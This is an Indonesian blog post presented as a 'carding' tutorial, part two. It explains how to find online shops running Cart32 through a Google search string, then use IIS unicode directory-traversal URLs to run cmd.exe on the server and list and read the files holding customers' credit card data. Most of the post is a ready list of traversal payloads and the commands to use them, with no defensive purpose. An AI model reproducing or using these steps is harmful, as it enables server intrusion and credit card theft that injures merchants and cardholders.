Tutorial Carding (Bagian II) ~ Rudie Newbie

Jumat, 06 Juni 2014

Tutorial Carding (Bagian II)

--------------------------------------

Tutorial ini spyro dapatkan dari suatu ftp seorang korban saat sedang mendeface webnya (lihat posting berjudul "Mengapa aku mendeface profil FS dan website Fun2Holic" (19 september 2006) di halaman Cerita hari ini.

--------------------------------------

1. Sama seperti diatas, Cari target dahulu di google.com dgn keyword allinurl:/cart32.exe/
2. Misalkan kita mendapat target dg url:

http://www.contoh.com/scripts/cart32.exe/blablabla , maka:

3. Ganti url tsb menjadi -> http://www.contoh.com/scripts/
4. Modifikasi url tsb dg memasukkan unicode dibelakangnya -> http://www.contoh.com/scripts/<unicode>
5. Contoh unicode utk path /scripts/ : -->
/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\
Sedangkan utk path /cgi-bin/ ->
/cgi-bin/..\..\..\..\..\..\winnt\system32\cmd.exe?/c+dir+c:\
/cgi-bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\
6. Sebagai contoh, pada url diatas menggunakan path /scripts/ maka diubah menjadi http://www.contoh.com/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
7. string diakhir unicode dg keterangan dir+c:\ maksudnya kita sedang berada dan melist directory c server target!
8. Untuk masuk ke directory cc's ganti perintahnya unicode dgn -> http://www.contoh.com/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\progra~1\mwainc\cart32\
9. Kita akan output list dari file .32 sebagai contoh namanya WRBURNS-001065.c32
10. Nah.., utk melihat filenya dg unicode http://www.contoh.com/scripts/%c1%9c/winnt/system32/cmd.exe?/c+type+c:\progra~1\mwainc\cart32\WRBURNS-001065.c32
11. Kalo tidak berhasil, kita masih bisa mencobanya dengan unicode yg laennya.
12. Ok, semoga berhasil, materi ke-2 Selesai.

/* ------------------------------|EOF|------------------------------ */

Posted in: Hacker,Kriptografi,Tips N Triks

Beranda

About Me

Label

Statistic User

Follower

OL

Jumat, 06 Juni 2014

Tutorial Carding (Bagian II)

0 komentar:

Posting Komentar

Postingan Populer

Label

Arsip Blog